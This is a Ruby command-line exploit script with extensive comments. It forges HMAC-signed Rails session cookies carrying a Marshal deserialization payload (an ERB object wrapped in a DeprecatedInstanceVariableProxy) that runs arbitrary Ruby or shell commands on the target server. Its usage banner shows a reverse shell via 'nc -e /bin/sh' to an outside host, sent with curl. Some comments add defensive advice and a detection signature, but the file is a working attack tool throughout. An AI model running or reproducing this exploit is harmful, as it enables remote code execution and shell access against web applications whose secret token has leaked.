#!/usr/bin/env ruby
require "base64"
require "erb"
require "openssl"
require "optparse"
module ActiveSupport
  module Deprecation
    # Local stand-in for the ActiveSupport class of the same name. Only the
    # fully-qualified constant name and the four instance variables matter:
    # Marshal.dump records both, and the receiving application resolves the
    # name against its own (real) ActiveSupport definition when it loads the
    # cookie. No behaviour of the real proxy is reproduced here.
    class DeprecatedInstanceVariableProxy
      # @param instance [Object] object the real proxy forwards to
      # @param method [Symbol] method name the real proxy calls on +instance+
      # @param var [String] name of the deprecated variable being proxied
      # @param deprecator [Object] deprecator the real proxy would report through
      def initialize(instance, method, var, deprecator)
        # Parallel assignment keeps the ivar definition order identical to
        # the original, which matters for the serialized byte layout.
        @instance, @method, @var, @deprecator = instance, method, var, deprecator
      end
    end
  end
end
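# Resolve an option value: nil passes straight through, '-' means "read all of
# stdin", the path of an existing regular file means "read that file", and any
# other string is taken literally. The result is always whitespace-stripped.
#
# Fixes relative to the original: File.exists? was removed in Ruby 3.2 (use
# File.exist?/File.file?), and File.open(...).read without a block leaked the
# file handle (File.read opens and closes it). File.file? also refuses
# directories, which the original would have tried to read and crashed on.
#
# @param spec [String, nil] raw option value from OptionParser
# @return [String, nil] stripped content, or nil when +spec+ is nil
def get_content(spec)
  return nil unless spec

  content = if spec.strip == '-'
              STDIN.read
            elsif File.file?(spec)
              File.read(spec)
            else
              spec
            end
  content.strip
end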
# Command-line front end. Builds a Rails CookieStore-style session cookie
# ("<base64 Marshal blob>--<hex HMAC-SHA1>") whose Marshal payload, when the
# application deserializes it, evaluates attacker-chosen Ruby. The only input
# that makes this work is the application's secret token: anyone holding it
# can sign arbitrary cookies. Defensive takeaways: treat a leaked secret as a
# full compromise and rotate it; never deserialize cookies with Marshal
# (a JSON cookie serializer removes this class of issue); and note that a
# legitimate session never contains the class names ERB or
# ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy, so their
# presence in a base64-decoded cookie is a usable detection signature.
opts = {}
op = OptionParser.new
op.banner = "usage: #{$0} [opts]\nexample: #{$0} -s mysecret -c 'nc -e /bin/sh 10.0.0.1 1234' -b _myapp_session | xargs curl -v myapp.com -b 2>&1 | egrep 'Cookie:|HTTP/'"
# Each value may be given inline, as a filename, or as '-' for stdin (see get_content).
op.on("-s", "--secret secret|filename|-", "Rails secret token") do |s| opts[:secret] = get_content s end
op.on("-e", "--code code|filename|-", "Ruby code to execute") do |e| opts[:code] = get_content e end
op.on("-c", "--command command|filename|-", "Shell command to execute") do |c| opts[:command] = get_content c end
# NOTE(review): the assignment runs first and the raw value is stored, so the
# return value of get_content is discarded here and the filename/'-' forms are
# never applied to the cookie name (only the literal form works for -b).
op.on("-b", "--cookie cookie|filename|-", "Cookie name to prepend") do |b| get_content opts[:cookie] = b end
op.parse!
# && binds tighter than ||: reject when both -e and -c are given, when neither
# is given, or when -s is missing.
if opts[:code] && opts[:command] || !opts[:code] && !opts[:command] || !opts[:secret] then
$stderr.puts "ERROR: must specify secret (-s) and either ruby code (-e) or shell command (-c) "
puts op
exit
end
# A shell command is wrapped in backticks (with any embedded backticks
# escaped) so that it becomes Ruby code run through Kernel#`.
code = opts[:code] || "`#{opts[:command].gsub(/\`/,'\\\`')}`"
secret = opts[:secret]
# create payload
# ERB.allocate skips initialize; @src is the compiled template source that
# ERB#result evaluates, so setting it directly turns the ERB into a holder
# for arbitrary code.
erb = ERB.allocate
erb.instance_variable_set :@src, code
# The proxy's job on the receiving side is presumably to forward a method call
# (here :result) to @instance when the object is touched — confirm against the
# ActiveSupport source for the targeted version.
depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new erb, :result, "foo", ActiveSupport::Deprecation
# Using the proxy as a hash key ensures Rails' key processing touches it.
hash = {depr => 'something'} # make stringify_keys! happy
marshalled = Marshal.dump(hash)
# Base64.encode64 wraps every 60 chars; the newlines are dropped so the value
# is a single cookie token.
payload = Base64.encode64(marshalled).gsub("\n", "")
# Signature over the base64 text, hex-encoded, joined with "--" — the
# classic CookieStore MessageVerifier layout.
sig = OpenSSL::HMAC.hexdigest('sha1', secret, payload)
cookie = "#{payload}--#{sig}"
# Emits "name=value" when -b was given, otherwise just the value.
puts (opts[:cookie] ? "#{opts[:cookie]}=" : '') + cookie